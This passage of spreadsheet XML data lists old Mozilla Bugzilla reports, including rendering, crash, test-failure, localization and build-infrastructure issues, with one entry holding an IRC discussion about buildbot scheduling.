The corresponding patch is the en-US part in https://bugzilla.mozilla.org/attachment.cgi?id=257411&amp;action=diff#mozilla/other-licenses/branding/firefox/locales/en-US/brand.properties_sec1
Current String in English for homePageSingleStartMain:
Firefox Start a fast search page with search results by XXX
New String:
Firefox Start a fast home page with built-in search
Please create the patch as 
cvs -z3 diff -u fi/other-licenses/branding/firefox/brand.properties
from the l10n directory we'll try to grab those patches together and land them with the en-US change.
See bug 372409 and bug 371309 for more information.</t>
  </si>
  <si>
    <t>CORE-78992</t>
  </si>
  <si>
    <t>HR with size=1 (height) produces size=2 effect.</t>
  </si>
  <si>
    <t>Whatever value I try with size attribute in HR element there is no action.
Build Gecko/20010504
win98
will attach simple test.</t>
  </si>
  <si>
    <t>CORE-443985</t>
  </si>
  <si>
    <t>PageX/Y properties are incorrectly calculated when a event is manually dispatched (initmouseevent)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
PageX/Y represent the horizontal/vertical coordinates of an event relative to the whole document.  This differs from clientX/clientY which are the horizontal/vertical coordinate within the application's client area.  When you scroll a document and then fire an event the pageY should be the clientY + scrolldata.
This works as expected in FF2 and it works in FF3 when clicking manually.  But when manually dispatching events in FF2 pageY would include scrolldata in FF3 pageY does not include scrolldata but ONLY when manually dispatching.
Reproducible: Always
Steps to Reproduce:
Open the attached page in FF3.  This page includes a 4000px spacer div followed by two buttons: report pageY and Simulate mouseup on the other button.  During onload a mouseup is automatically simulated.
Actual Results:  
You'll see the word FAIL in the body of the page because pageY is less than 4000.  If you manually click on report pageY you'll see the word PASS in the body of the page.  You may also manually click on the simulate mouseup button to get the word FAIL to appear again.  On my machine pageY is typically ~1000px.
Expected Results:  
The word PASS should appear in the body of the page regardless of whether you push the left button or the right button.  pageY should always be &gt;4000.
This bug was discussed elsewhere in bug 411031 and bug 405632. This regression  caused a bug in Microsoft's Virtual Earth maps which depended on the behavior of pageY.
There is no public standard for the behavior of pageY but there is a defacto standard behavior: FF2 Safari 3.1 and Opera 9.5 all behave the same way (they all say PASS when you load up the page).  FF3 changed the behavior of this attribute incorrectly.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-396327</t>
  </si>
  <si>
    <t>missing urchin data for mozilla-europe.org since 14th of September</t>
  </si>
  <si>
    <t>Bug 392888 is back since friday data from www.mozilla-europe.org - nladm01 is not in Urchin probably affects mozilla.com as well</t>
  </si>
  <si>
    <t>CORE-529733</t>
  </si>
  <si>
    <t>Crash in nsCacheMetaData::SetElement</t>
  </si>
  <si>
    <t>Crash [@ memmove | nsCacheMetaData::SetElement(char const* char const*)]
is currently #45 in 1.9.3 top crash list (all crashes on Windows).
Looks like a regression from bug 394425.
memmove	 MEMCPY.ASM:271
nsCacheMetaData::SetElement	netwerk/cache/src/nsCacheMetaData.cpp:98
nsCacheEntryDescriptor::SetMetaDataElement	netwerk/cache/src/nsCacheEntryDescriptor.cpp:470
nsHttpChannel::AddCacheEntryHeaders	netwerk/protocol/http/src/nsHttpChannel.cpp:2603
nsHttpChannel::InitCacheEntry	netwerk/protocol/http/src/nsHttpChannel.cpp:2510
nsHttpChannel::ProcessNormal	netwerk/protocol/http/src/nsHttpChannel.cpp:1113
nsHttpChannel::ProcessResponse	netwerk/protocol/http/src/nsHttpChannel.cpp:1014
nsHttpChannel::OnStartRequest	netwerk/protocol/http/src/nsHttpChannel.cpp:5135
nsInputStreamPump::OnStateStart	netwerk/base/src/nsInputStreamPump.cpp:439
nsInputStreamPump::OnInputStreamReady	netwerk/base/src/nsInputStreamPump.cpp:395
nsInputStreamReadyEvent::Run	xpcom/io/nsStreamUtils.cpp:191
nsThread::ProcessNextEvent	xpcom/threads/nsThread.cpp:527 
...
List of crashes with this signature in the past week:
http://crash-stats.mozilla.com/report/list?branch=1.9.3&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=memmove%20|%20nsCacheMetaData%3A%3ASetElement%28char%20const*%2C%20char%20const*%29</t>
  </si>
  <si>
    <t>TOOLKIT-450675</t>
  </si>
  <si>
    <t>Fix test_expiration.js</t>
  </si>
  <si>
    <t>See Bug 449640 Comment 12</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-390569</t>
  </si>
  <si>
    <t>Thunderbird 2.0.0.6 push to production</t>
  </si>
  <si>
    <t>Can you push the thunderbird 2.0.0.6 changes live for production?
Note: mozilla-europe.org will need to be synched too.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-308933</t>
  </si>
  <si>
    <t>Docs for download manager say `show' it is `open'</t>
  </si>
  <si>
    <t>In download_manager.xhtml it says: 
Show File Location
  When a download has finished the Show link will appear
by the
    file entry.  Use it to open the folder where  saved the
file.
This should be something like 
Open the File
  When a download has finished the Open link will appear
by the file
    entry. Use it to open the file.</t>
  </si>
  <si>
    <t>NSPR-191948</t>
  </si>
  <si>
    <t>The libfilename test in the 32-bit HP-UX builds fails.</t>
  </si>
  <si>
    <t>The libfilename test in the 32-bit HP-UX builds
fails because the current implementation attempts
to load libmy.sl but it is not on the shared
library search path.
This can be worked around by setting SHLIB_PATH
to dll (or the full pathname of the pr/tests/dll
directory in the build tree) when running the test.</t>
  </si>
  <si>
    <t>TOOLKIT-236194</t>
  </si>
  <si>
    <t>Save Link to Disk context menu item does not send HTTP referrer</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040302 Firefox/0.8.0+
This is a Firefox spinoff of the SeaMonkey bug 196871.
When right-clicking a link to a file (such as one of the files on the page I
supplied in the URL field) and choosing Save Link to Disk Firefox does not send
the current page as the referrer as it does when clicking the link normally.
This is a problem on sites such as the one linked to since they perform a check
on the referrer to make sure it is coming from within their own site. In this
case Firefox downloads an HTML error message rather than the real file.
The API change in bug 170722 lets us send a referrer when saving a file and we
should leverage that in Firefox. I have a patch.
Reproducible: Always
Steps to Reproduce:
1. Find a site that authenticates downloads based on the HTTP referrer.
2. Right click a link Save Link to Disk.
Actual Results:  
Receive an HTML page containing an error or some other undesirable result.
Expected Results:  
Download the correct file.</t>
  </si>
  <si>
    <t>CORE-282432</t>
  </si>
  <si>
    <t>nsFileChannel::AsyncOpen throws for nonexistent files</t>
  </si>
  <si>
    <t>Right now nsFileChannel::AsyncOpen throws if the file does not exist.  Perhaps
for consistency with other channel types we should just return NS_OK and then
report an error in OnStartRequest?</t>
  </si>
  <si>
    <t>CORE-505314</t>
  </si>
  <si>
    <t>Assertion failed: i != 0 on collecta.com</t>
  </si>
  <si>
    <t>Loading http://collecta.com/ in a debug build triggers:
Assertion failed: i != 0 (/Users/jruderman/central/js/src/nanojit/Assembler.cpp:1605)</t>
  </si>
  <si>
    <t>TOOLKIT-375621</t>
  </si>
  <si>
    <t>complete mar on Mac contains two 0 length files:  Plugin.plugin/Contents/MacOS/Default and Plugin.plugin/Contents/Resources/Default</t>
  </si>
  <si>
    <t>complete mar on Mac contains two 0 length files:  Plugin.plugin/Contents/MacOS/Default and Plugin.plugin/Contents/Resources/Default
from mar -t update.mar | grep ^0:
0       0644    Plugin.plugin/Contents/Resources/Default
0       0644    Plugin.plugin/Contents/Resources/Default
0       0644    Plugin.plugin/Contents/Resources/Default
0       0644    Plugin.plugin/Contents/Resources/Default
0       0644    Plugin.plugin/Contents/MacOS/Default
0       0644    Plugin.plugin/Contents/MacOS/Default
0       0644    Plugin.plugin/Contents/MacOS/Default
0       0644    Plugin.plugin/Contents/MacOS/Default
0       0644    Plugin.plugin/Contents/MacOS/Default
the root cause seems to be bug #375415 which leads to this bug which leads to bug #373908 on the client (updater stuck in an infinite loop) and when you kill updater on the client you can end up with a horked firefox (see bug #375619)</t>
  </si>
  <si>
    <t>MOZILLA.ORG-264743</t>
  </si>
  <si>
    <t xml:space="preserve">l10n CVS request: Language (ga-IE) - Brian King </t>
  </si>
  <si>
    <t>The Irish locale team has a translation for Firefox 1.0 that we want to check
into CVS. This bug is to request CVS access and to check procedure in general.
There are 2 members that need access:
- Brian King
- Kevin Scannell
Note that Brian King already has access to the website CVS see bug 195192.
Perhaps this can be extended to the 110n branch.
Please let uws know what we need to do next.</t>
  </si>
  <si>
    <t>briks.si</t>
  </si>
  <si>
    <t>CORE-166235</t>
  </si>
  <si>
    <t>|-moz-user-select = none| should prevent copying to clipboard</t>
  </si>
  <si>
    <t>The CSS attribute |-moz-user-select| can be set to none
to prevent the user from being able to select text.
Visually this looks like it's working. But if you copy to the
clipboard this text appears when you paste into a text editor.
STEPS TO REPRODUCE:
1. Load the testcase I will attach below
2. It contains four cells of text
3. One of the four cells has |-moz-user-select| set to none 
4. Try to copy the entire table to the clipboard
5. You will see three of the four cells highlighted in blue
6. So far so good
7. But paste into any text editor
8. BUG: you see the contents of all four cells!</t>
  </si>
  <si>
    <t>CORE-74603</t>
  </si>
  <si>
    <t>Append isn't working from script</t>
  </si>
  <si>
    <t>To reproduce on unix:
$ echo this is line \#1 &gt; /tmp/foo
then run the attached script in xpcshell
$ js test.js
Type Manifest File: /usr/src/MOZILLA/mozilla/dist/bin/components/xpti.dat
nsNativeComponentLoader: autoregistering begins.
nsNativeComponentLoader: autoregistering succeeded
nNCL: registering deferred (0)
/tmp/foo
exists=true
size=16</t>
  </si>
  <si>
    <t>SEAMONKEY-361708</t>
  </si>
  <si>
    <t>Make the way links from mailnews behave pref controllable</t>
  </si>
  <si>
    <t>At the moment whenever you click on a link in mailnews it always opens in the most recently used browser window (or a new one if there's not one already open).
I would like to change this behaviour so that it looks at a pref and then from that pref decides whether to use an existing window/tab open a new window or open a new tab in an existing window.
The pref that has been suggested is used is browser.link.open_external</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-284716</t>
  </si>
  <si>
    <t>Create DDBs in nsImageWin::Optimize</t>
  </si>
  <si>
    <t>This bug will switch back to creating DDBs for Win2k WinXP and later versions.
 Win95/98/NT will remain using DIBs and Min-Size-Before-Optimizing limits until
a proper solution is found (Bug 218861)
Bug 277762 Comment 30 has stats to prove DDBs are faster
Bug 205893 has caused some major slowdowns because it switched
nsImageWin::Optimize from DDBs to DIBs.  The move had something to do with
resource usage.  Apparently DIBs use less GDI resources.  However DDBs are much
much faster than DIBs.  This can be seen on Bug 277762 Bug 255648 Bug 278614
Bug 260676 and Bug 244555.  Bug 244555 even identifies Bug 205893 as the
culprit however I decided to create a new bug because this patch could belong
to any one of these bugs.</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-323020</t>
  </si>
  <si>
    <t>Use Current Page button to set homepage</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
As in firefox a button that you can just press which take s the url(s) of the current tab(s) and sets them as the hompage
Reproducible: Always</t>
  </si>
  <si>
    <t>romeojava</t>
  </si>
  <si>
    <t>CORE-445101</t>
  </si>
  <si>
    <t>rendering does not change if systemLanguage attribute changes</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-266838</t>
  </si>
  <si>
    <t>Update extension: Search Keys</t>
  </si>
  <si>
    <t>0.5: Fixes the extension to work numpad number keys (reported in an UMO comment).
http://www.squarefree.com/extensions/search-keys/
http://www.squarefree.com/extensions/search-keys/search-keys.xpi</t>
  </si>
  <si>
    <t>CORE-530373</t>
  </si>
  <si>
    <t>Replace PR_MIN/PR_MAX with NS_MIN/NS_MAX in DOM</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.3a1pre) Gecko/20091120 Minefield/3.7a1pre (.NET CLR 3.5.30729)
Build Identifier: 
Please see Bug #512106.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-327985</t>
  </si>
  <si>
    <t>refresh issue for delegate controls</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20051212 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20051212 Firefox/1.6a1
description will be with proposed patch.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-174397</t>
  </si>
  <si>
    <t>Support for getClientRects and getBoundingClientRect</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/getclientrects.asp
http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/getboundingclientrect.asp
These two methods return a TextRectangle object which describes the size and
position of the element relative to the client area. Currently the bounding
rectangle can be found but it is not very straight forward and it is very error
prone. This information is already available inside the layout engine and it
would make sense to provide interfaces for these to scripting.
The client rects for inline elements that wrap is today not available to scripting</t>
  </si>
  <si>
    <t>SEAMONKEY-47336</t>
  </si>
  <si>
    <t>filenames after '?' chopped on file:// listings</t>
  </si>
  <si>
    <t>./mozilla file://wherever
incorrectly shows the file
printer.pl?issue=2000-05&amp;artcile=gear
as
printer.pl
and also doesn't display their sizes or dates.</t>
  </si>
  <si>
    <t>ragnar</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-379262</t>
  </si>
  <si>
    <t>AllPeers 0.56.2 stubs need swapping out</t>
  </si>
  <si>
    <t>We found an issue with the Linux version (linking to a shared library that is not present in all distributions) so we've submitted a fixed version. XPIs are located at:
http://www.allpeers.com/download/amo/0.56.2/allpeers_beta-0.56.2-fx-linux.xpi
http://www.allpeers.com/download/amo/0.56.2/allpeers_beta-0.56.2-fx-macosx.xpi
http://www.allpeers.com/download/amo/0.56.2/allpeers_beta-0.56.2-fx-windows.xpi
Extension ID: allpeers@allpeers.com
AMO page: https://addons.mozilla.org/en-US/firefox/addon/3234</t>
  </si>
  <si>
    <t>SEAMONKEY-449426</t>
  </si>
  <si>
    <t>Port |Bug 447934 â€“ Default browser check doesn't return false if the registry key doesn't exist| to SeaMonkey</t>
  </si>
  <si>
    <t xml:space="preserve">I did not look into the details
but Jens Hatlak  guess SeaMonkey wants to do this too ?
He noted
Function and variable names are a bit different in /suite/shell/src/nsWindowsShellService.cpp
Frank Wein  added
Some code [in /suite file] is from mail/ shell code to handle multiple application types and the special registry keys needed as default mail client. </t>
  </si>
  <si>
    <t>SEAMONKEY-28717</t>
  </si>
  <si>
    <t>gcc 2.95.2 crashes building htmlparser/src/nsViewSource.cpp</t>
  </si>
  <si>
    <t>When building mozilla on cement using gcc 2.95.2 (/builds/local/bin)
I am crashing with the following error.  I opened a bug against gcc
as suggested.
./../dist/include/nsCOMPtr.h:556: Internal compiler error in `output_die' at
dwarf2out.c:5426
Please submit a full bug report.
See  for instructions.
gmake: *** [nsViewSourceHTML.o] Error 1</t>
  </si>
  <si>
    <t>SEAMONKEY-12591</t>
  </si>
  <si>
    <t>mouse-over for local files extends across column width</t>
  </si>
  <si>
    <t>This one is a little hard to explain so I will just explain the steps.
To reproduce (on windows):
1. Enter c:\ in URL bar
2. Mouse over a file in your directory listing it will highlight.
3. Continue mousing to the right past the filename and into the whitespace
beyond in the same row and column.
Results: Link will still be highlighted. It should not be since you are not
over it anymore.
Note this happens whether or not you start on the file initially or just on
whitespace between the columns.
This is on all platforms with 8/26 builds.
p.s. I am guessing randomly at Components here</t>
  </si>
  <si>
    <t>paulmac</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-224229</t>
  </si>
  <si>
    <t>/download.html and /products/mozilla1.x/  don't link to mozilla download page</t>
  </si>
  <si>
    <t>http://website-beta.mozilla.org/products/mozilla1.x/ should
link to http://website-beta.mozilla.org/products/mozilla1.x/download/
the 'other operating systems' link in the download section of
the sidebar links to the wrong thing.
maybe the download section of the sidebar should go away and be
replaced with a download now button. or something.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-505240</t>
  </si>
  <si>
    <t>patcher-config-bump.pl doesn't know how to add 'beta-dir' to the patcher config</t>
  </si>
  <si>
    <t>beta-dir instructs patcher to put the 'beta' channel snippets in their own directory which in turn lets use push 'release' and 'beta' snippets separately. This is an important feature for stable branches.</t>
  </si>
  <si>
    <t>FIREFOX-369311</t>
  </si>
  <si>
    <t>Typo in buildSelectionMetadata breaks the places context menu in certain conditions</t>
  </si>
  <si>
    <t>Created attachment 253991
patch
A typo in buildSelectionMetadata breaks the places context menu in certain conditions.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-422237</t>
  </si>
  <si>
    <t>AMO pt - Extension Localization Effort / My Image Here</t>
  </si>
  <si>
    <t>Martijn is fine wiht us to help and send him the meta-data ( descriptions ) since his extension is already in pt-BR but missing the pt-BR description text. 
Extension URL: 
---</t>
  </si>
  <si>
    <t>clauber.halic</t>
  </si>
  <si>
    <t>CALENDAR-334070</t>
  </si>
  <si>
    <t>Views don't care about mBatchCount!</t>
  </si>
  <si>
    <t>http://landfill.mozilla.org/mxr-test/mozilla/search?string=mBatchCount&amp;find=calendar&amp;filter=
Views keep track of batches but don't ignore changes that happen during them.  Patch to follow</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-516706</t>
  </si>
  <si>
    <t>Get 2 Mac Minis to test them as build machines</t>
  </si>
  <si>
    <t>Since running OS X in VMWare has been problematic for build performance I'd like to look into getting Mac hardware to run our builds on. Mac Minis sound like a possibly better/cheaper solutions than Xserves.
I'd like to get 2 Minis to start testing this out and ideally figuring out a sane way to get them fully automated (netbooting imaging etc).
Looking at the Apple store today I can see:
2.0GHz Intel Core 2 Duo - 2GB Ram : $649</t>
  </si>
  <si>
    <t>CORE-339220</t>
  </si>
  <si>
    <t>Tracking bug for SVG on the 1.8 branch</t>
  </si>
  <si>
    <t>Rather than mess with the existing bugs I'm going to attach patches here and seek approval here.</t>
  </si>
  <si>
    <t>SEAMONKEY-334903</t>
  </si>
  <si>
    <t>Seamonkey update page appears in window with no navigation or tabs</t>
  </si>
  <si>
    <t>If you click Yes to update when the update available appears then you get a new window with no navigation (back forward URL etc) and no tabs bar. This makes it quite difficult to use. 
Expected: a normal browser window actually a normal browser tab because I have it set to open new windows in tabs.
Seamonkey 1.0. Have installed 1.0.1 but can't recheck on demand - there's no way to do that is there?</t>
  </si>
  <si>
    <t>aaronclawrence</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-189819</t>
  </si>
  <si>
    <t>User Support Chimera &amp; Encouragement for the team</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.0.1) Gecko/20030117 Chimera/0.6+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.0.1) Gecko/20030117 Chimera/0.6+
This bug is a public decoration that that user base affirms and is solidly
behind Mikes 1/7 comments and rejects Mikeâ€™s 1/19 blog comments regarding the
state of Chimera.  While this bug itself is invalid the creation of such bug
serves to demonstrate to AOL and Netscape the publics desire to have Chimera
around for a long time.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>riscky</t>
  </si>
  <si>
    <t>BUGZILLA-349855</t>
  </si>
  <si>
    <t>editgroups.cgi doesn't protect the querysharegroup from deletion</t>
  </si>
  <si>
    <t>editgroups.cgi protects â€œSpecial Groupsâ€ from deletion by including them into a certain array. The querysharegroup should be included in this array. Additionally template/en/default/admin/groups/list.html.tmpl should know about this as well and make the protection visible in the bug list as it does for the other â€œSpecial Groupsâ€.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-769588</t>
  </si>
  <si>
    <t>Port bug 722872 - call the Init method after creating nsITransferable</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #722872 +++
I have already done a minor port here to fix bustage:
http://hg.mozilla.org/comm-central/rev/4e4cd1fb04c3
We need to fix the rest of the instances in mailnews and mail
http://mxr.mozilla.org/comm-central/search?string=nsITransferable&amp;find=mail&amp;findi=&amp;filter=^[^\0]*%24&amp;hitlimit=&amp;tree=comm-central
Should be reasonable simple to do attachment 636714 has plenty of examples as well.</t>
  </si>
  <si>
    <t>BUGZILLA-238665</t>
  </si>
  <si>
    <t>change anything on the selected is awkward in bugs_not_changed error</t>
  </si>
  <si>
    <t>123   [% ELSIF error == bugs_not_changed %]
124     [% title = BLOCK %][% terms.Bugs %] Not Changed[% END %]
125     Um you apparently did not change anything on the selected [% terms.bugs %].
change on to in</t>
  </si>
  <si>
    <t>CORE-460335</t>
  </si>
  <si>
    <t>disallow redirects when updating an application cache</t>
  </si>
  <si>
    <t>The application cache spec has changed to completely disallow redirects during a cache update (primarily to avoid problems with captive portals).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-984923</t>
  </si>
  <si>
    <t>Improve prioritizeBuilders</t>
  </si>
  <si>
    <t>Our current prioritizeBuilders functions has been causing us grief in a few ways:
- It tries to assign work to only the most important builders usually only one or two at a time. we've had many cases where these builders can't assign work because their nextSlave functions preclude any of the connected slaves from being used. For example nextAWSSlave functions won't run a build on spot machines if there have been too many retries. In the case we have only spot nodes connected and the most important builder has too many retries we end up in a case where no work is being assigned. prioritizeBuilders is returning only the most important builder and its nextSlave returns None and nothing gets done. This can cause massive delays for *other* builders that are also pending.
- Because pending jobs start piling up behind these stuck important builders that can't assign work aws_watch_pending tries to start more and more machines to service those requests. Eventually we end up starting ALL the machines including on-demand nodes. In the case described above this unplugs the stuck builder and then all the other pending requests can be serviced as well. I'd guess this makes this function one of our most expensive functions in the code base :)
We should change this function to take into account the number of connected slaves and give other builders and chance to run as well.
Some irc logs for more context:
06:39  bhearsum rail: any thoughts on https://github.com/catlee/buildbot-configs/compare/master...branch_priorities ?
06:39  the idea is to be able to process as many builders as we have slaves
06:39  while still preserving branch priorities
06:40  catlee: as opposed to all of the builders which is probably higher than the number of slaves?
06:42  bhearsum: before it would pick just the most important builders
06:42  bhearsum: which could be just 1 or 2 of the set of pending
06:43  bhearsum: the problem we've been seeing is that those 1 or 2 most important builders can't actually run on any of the available slaves
06:43  catlee: ah
06:53  sorry getting distracted
06:54  the problem the old function was trying to avoid was having slaves connect while the master is iterating through the sorted list of builders
06:56  so before we'd return the list of builders in sorted order. If builder 0 had no slaves we'd move onto builder 1. If a slave connected between then builder 1 would get run even though builder 0 is more important
06:56  so then we changed it to return just the most important builders
06:57  but returning just the most important builders fails when those builders can't assign work due to nextSlave restrictions
06:58  so I'm thinking we should be able to safely consider as many builders as we have connected slaves
07:00  seems fine but i feel like it still hasn't clicked in my head yet
07:01  i'll come back to it after this release stuff calms down
07:01  sure
07:23  catlee: i guess my only question is: why not return all of the builders instead of just len(connected slaves)?
07:25  bhearsum: in the case we have no connected slaves buildbot will process builders in order. that processing happens in a bit of an async loop so slaves can connect in between builders being processed. so the most important builder can be skipped because there are no slaves available at the time and then a slave connects and a less important builder gets it
07:27  catlee: how does that work when we're just returning a subset of all of the builders then? i'm not sure if it was clear but i was suggesting returning all of the builders sorted
07:28  bhearsum: right I'm trying to explain why returning all the builders sorted doesn't work
07:29  catlee: but returning a subset of those builders sorted works?
07:29  * bhearsum rereads everything
07:29  t = 0: sort builders into b0 b1 b2 return [b0 b1 b2]. no slaves connected
07:29  t = 1: look at b0. no slaves move on
07:29  t = 2: slave s1 connects
07:29  t = 3: look at b1 give job to s1
07:30  right i understand that bug
07:33  ok
07:33  so that's what happens if you return all the builders sorted
07:34  doesn't that happen if you return [b0 b1] in your scenario too?
07:35  hopefully not
07:35  because I know we have 2 slaves
07:35  so I'll return [b0 b1]
07:35  if we only have 1 slave I'll return [b0]
07:36  anyway that's my idea for improving things
07:36  right now we return just [b0] no matter how many slaves we have
07:36  yeah
07:36  that's clearly silly
07:36  and sometimes b0 can't run
07:36  so what happens if we return [b0 b1] but both slaves that are free are jacuzzi'ed to b2 which also has pending?
07:37  we are taking into account jacuzzis
07:37  I think...
07:37  oh right
07:37  just not in the context of this diff
07:37  right
07:38  we've already filtered our slaves down
07:38  right ok
07:38  so its' cases like nextAWSSlave that forces things to run on spot/not-spot
07:40  one more question: you mentioned above that sometimes builders can't actually run on any of the available slaves. does that mean those builders don't have those slaves in their list or something else?
07:40  something else
07:40  nextSlave prevents it from running on a connected slave
07:40  ah
07:40  e.g. we have only spot connected but the builder has retries so we want to run on ondemand
07:40  so nextSlave returns none
07:41  this is what's causing some of our spikes I think
07:41  b0 is pending so we're spinning up machines for it
07:42  but it can't run on any of the machines
07:42  meanwhile b1 b2 ... are piling up
07:42  so could we still hit this in a case where we return [b0b1] but the slaves get rejected by nextSlave? (but b2 never gets tried because prioritizeBuilders won't return it until b0 or b1 starts)
07:42  but they're not getting a chance to take jobs
07:42  yeah that makes sense
07:42  i think i have a full grasp of the problem now
07:42  yeah we could still hit it
07:43  but presumably we'll cycle fast enough that it'll be much rarer
07:43  hopefully...
07:43  well part of this is a failure to spin up the right instances for jobs
07:44  but this change should give other builders a chance
07:44  more of a chance than they have now anyway
07:44  i suppose there's no way to invalidate and rerun prioritizeBuilders when a slave connects mid-iteration through builders?
07:44  yeah
07:44  it definitely sounds like a big improvement
07:44  not really no
07:45  I was thinking maybe some caching could help
07:45  like if we're looking at the same builders with same set of slaves then do something different
07:45  or perhaps claling nextSlave from here too
07:45  but that sounds expensive
07:45  yeah...
07:45  it's a mismatch between nextSlave prioritizeBuilders and watch_pending
07:46  well i'm fine with landing this. a comment about the situation where you don't start b2 because of nextSlave rejects would be useful though i think
07:48  catlee: thanks for all the hand holding here
07:48  bhearsum: thanks for digging into it
07:49  in the glorious future it seems like it would be nice to have prioritizeBuilders and nextSlave closer together or maybe the same code
07:49  it's good to have more people to blame^W^W understand this
07:49  hey
07:49  don't you be putting me as the author here!
07:49  qrefresh -u ftw
07:49  qrefresh -fu
07:49  :P</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-521025</t>
  </si>
  <si>
    <t>Create Production web instances for support.momo.com SUMO instance</t>
  </si>
  <si>
    <t>Create Production web instances for support.mozillamessaging.com SUMO instance</t>
  </si>
  <si>
    <t>MOZILLA.ORG-314065</t>
  </si>
  <si>
    <t>copies for bug 313199</t>
  </si>
  <si>
    <t>Please do the cvs copies in attachment 21006 to bug 313199.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-54608</t>
  </si>
  <si>
    <t>Tinderbox scripts should be config-file driven</t>
  </si>
  <si>
    <t>Tinderbox scripts should be config-file driven.  I should
not have to edit tbox sources to configure for my system
this will make it hard to update sources later (conflicts etc.).
Tinderbox 1.0 client build-seamonkey.pl script does this using
tinder-config.pl we should do something similar here.
[Current install instructions says: ]
1) read and edit the variables found in the files ./src/lib/* particularly:
        TinderConfig.pm: general configuration settings
        Error_Parse.pm: the regular expressions for highlighting errors
        FileStructure.pm: filesystem (storage) and global/per-project settings
        BTData.pm: bug tracking configuration
        TreeData.pm: version control configuration</t>
  </si>
  <si>
    <t>kestes</t>
  </si>
  <si>
    <t>WEBSITES-445778</t>
  </si>
  <si>
    <t>add William Quiviger's blog to Planet Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: 
This is the blog of Mozilla's new EU Community Markting Manager
Reproducible: Always</t>
  </si>
  <si>
    <t>william.quiviger</t>
  </si>
  <si>
    <t>BUGZILLA-58179</t>
  </si>
  <si>
    <t>End date not included in queries</t>
  </si>
  <si>
    <t>When querying for bugs across a range of dates the last date is not included in 
the results.  This is probably not what the user would expect.</t>
  </si>
  <si>
    <t>curt</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-230264</t>
  </si>
  <si>
    <t>inspector leaks</t>
  </si>
  <si>
    <t>Using inspector causes lots of stuff to be leaked.
Patches soon...</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-306339</t>
  </si>
  <si>
    <t>[Firefox] fix advanced.dtd connection.dtd browser.dtd and installer.inc on 1.8 Branch</t>
  </si>
  <si>
    <t>currently the Tinderbox for German Firefox Branch builds is orange due to
string changes.</t>
  </si>
  <si>
    <t>SEAMONKEY-5342</t>
  </si>
  <si>
    <t>Perl errors are not reflected in Tinderbox error log</t>
  </si>
  <si>
    <t>When the build breaks because of Perl errors this does not show up on the
Tinderbox log.</t>
  </si>
  <si>
    <t>jj.enser</t>
  </si>
  <si>
    <t>CORE-399542</t>
  </si>
  <si>
    <t>libpng 1.2.21 update broke a unit test</t>
  </si>
  <si>
    <t>The update to 1.2.21 caused the modules/libpr0n/test/unit/test_encoder_png.js unit test to fail... The encoded APNG looked and worked properly but the bits were different.
pngcheck on the expected output is:
File: png1-ok.png (0 bytes)
  chunk IHDR at offset 0x0000c length 13
    3 x 3 image 24-bit RGB non-interlaced
  chunk acTL at offset 0x00025 length 8
    unknown private ancillary unsafe-to-copy chunk
  chunk fcTL at offset 0x00039 length 26
    unknown private ancillary unsafe-to-copy chunk
  chunk IDAT at offset 0x0005f length 16
    zlib:  deflated 256-byte window default compression
    zlib line filters (0 none 1 sub 2 up 3 avg 4 paeth):
      1 2 2 (3 out of 3)
  chunk fcTL at offset 0x0007b length 26
    unknown private ancillary unsafe-to-copy chunk
  chunk fdAT at offset 0x000a1 length 22
    unknown private ancillary unsafe-to-copy chunk
  chunk fcTL at offset 0x000c3 length 26
    unknown private ancillary unsafe-to-copy chunk
  chunk fdAT at offset 0x000e9 length 27
    unknown private ancillary unsafe-to-copy chunk
